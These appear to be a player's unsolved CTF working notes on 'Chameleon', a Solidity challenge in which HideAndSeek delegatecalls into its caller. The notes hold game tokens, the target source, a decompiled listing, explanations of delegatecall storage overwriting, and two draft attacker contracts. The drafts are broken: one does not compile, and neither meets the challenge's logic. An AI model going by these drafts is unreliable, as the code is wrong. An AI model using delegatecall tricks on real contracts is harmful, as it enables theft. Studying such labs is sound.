# Chameleon

## account and contract

```
Your game account: 0xb7f5138d3B523e5975510Ee70Cea1372E8F7d663
Your account token: SXZoN7dXxJ0ndfOdbRoXsadDHfi4VlTrmGUIHdj0VbahoEWD3vTF2LJoXhJQhxUXclBUo/BLz25G44DDydSDxeKo8nAHpOeuVr7bRW5QOoDEeC8SsuyNAw6sWz8IOIQ0pNz0CCSZHxLXrq5gb1KDKXmbeIBXlE97P1iXoCsZnF0=
Please keep your account token, and transfer some Ether to your game account. The transferred Ether is for transaction fee for deploying your game contracts. Then, continue to Choice 2 to deploy a new game contract.
```

```
Game contract is deploying...
Transaction hash of game contract deployment: 0x17e9ffce96b6a4000415deadf1a4811113a498314f0edd393f338ae541fdac5a
Your contract token: LLYpjTL86KFw9o9HlE4b6aPd4ok/+GHUBxOq1s5pD0ExWDbTKS7e461NChis2LdjhuvpwjH/WKT0hwlEj9CEjMJXBBE5AoaoKTlZAan/JJZQXl8zQ1n79I172IXsh5cy+4UzCyw+YFjWqQ0jddczmFMfAs1+UXQBSf1IJiWBWLtOoOiN3fH/sYatR0U6sfBep5siQSIX1pLo9UA2iTylqA==
Keep your contract token, and now you may go and solve the challenge!
Your goal is to set the `sendFlag` variable in the game contract to `true`.
Once you solve the challenge, continue to Choice 3 to request for the flag.
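```

## Functions

```javascript=
pragma solidity ^0.5.17;

contract Chameleon {
    uint randomNumber = 0;
    bool public sendFlag = false;
    function HideAndSeek() public {}
}

contract Hack {
    address target;
    function run (address _target) public {
        target = _target;
        Chameleon instance = Chameleon(target);
        instance.HideAndSeek();
    }
    function receive () external {
        if(randomNumber==1){
            fallback()
        }
        randomNumber = 1;
        sendflag = True;
    }
}
```

### yuka:

```javascript=
pragma solidity ^0.5.17;

contract Chameleon {
    uint randomNumber = 0;
    bool public sendFlag = false;
    function HideAndSeek() public {}
}

contract Hack {
    address target;
    uint randomNumber;
    bool public sendFlag;
    bool success;
    function run (address _target) public {
        target = _target;
        Chameleon instance = Chameleon(target);
        instance.HideAndSeek();
    }
    function receive () external {
        if(success != false){
            require(randomNumber == 1);
        }
        else{
            sendFlag = true;
        }
    }
}
```

> `abi.encodeWithSignature("")`: ABI-encodes a call from a signature string plus its arguments. With an empty signature and no parameters, the result is only a 4-byte selector (the first four bytes of the hash of the empty string), which is consistent with the 4-byte call data (`len 4`) in the decompiled bytecode below. A selector that matches no function in the callee is routed to the callee's fallback function; in Solidity 0.5.x that is the unnamed `function () external`, and a function named `receive` is an ordinary function.
https://docs.soliditylang.org/en/v0.5.3/miscellaneous.html?highlight=abi.encodeWithSignature#global-variables

> `msg.sender.delegatecall`: executes the code of another contract (here `msg.sender`, the caller of `HideAndSeek`) with the state (storage) of the calling contract (here `Chameleon`). Storage is addressed by slot position, not by variable name, so code chosen by the caller can write to `Chameleon`'s slots, including the one that holds `sendFlag`; this is why a delegatecall into a caller-supplied address is unsafe.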
https://medium.com/@houzier.saurav/calling-functions-of-other-contracts-on-solidity-9c80eed05e0f

![](https://i.imgur.com/YQ4x3NN.png)
![](https://i.imgur.com/4yfPARI.png)
![](https://i.imgur.com/bTRKxJi.png)

## source code

```javascript=
pragma solidity ^0.5.17;

contract Chameleon {
    uint randomNumber = 0;
    bool public sendFlag = false;
    function HideAndSeek() public {
        bool success;
        (success,) = msg.sender.delegatecall(abi.encodeWithSignature(""));
        require(!success);
        (success,) = msg.sender.delegatecall(abi.encodeWithSignature(""));
        require(success);
    }
}
```

## decompiled bytecode

這個decompiled 好像就是題目的sourcecode Chameleon.sol
可以弄在[https://remix.ethereum.org](https://remix.ethereum.org) 上還原function
在vm上點HideAndSeek會出錯
~~不知道是不是因為沒錢?~~
~~需要轉錢給Chameleon這個contract嗎?~~
好像是因為 delegatecall 都會 success，所以第一個 `require(!success);` 就失敗了（從 Remix 直接點的話，msg.sender 應該是沒有 code 的一般帳號，對這種位址做 delegatecall 會直接回傳 success）

```javascript=
#
# Panoramix v4 Oct 2019
# Decompiled source of ropsten:0xe38fC5991c67AFe7c4f154142E1ce49B5A0AC04a
#
# Let's make the world open source
#

def storage:
    unknownec19a84f is uint8 at storage 1

def unknownec19a84f() payable:
    return bool(unknownec19a84f)

#
# Regular functions
#

def _fallback() payable: # default function
    revert

def unknownb315c506() payable:
    mem[132 len 0] = None
    delegate caller.mem[132 len 4] with:
        gas gas_remaining wei
        args
    require not delegate.return_code
    if not return_data.size:
        mem[168 len 0] = None
        delegate caller.mem[168 len 4] with:
            gas gas_remaining wei
            args
    else:
        mem[ceil32(return_data.size) + 169 len 0] = None
        delegate caller.mem[ceil32(return_data.size) + 169 len 4] with:
            gas gas_remaining wei
            args
    require delegate.return_code
```

###### tags: `unsolved`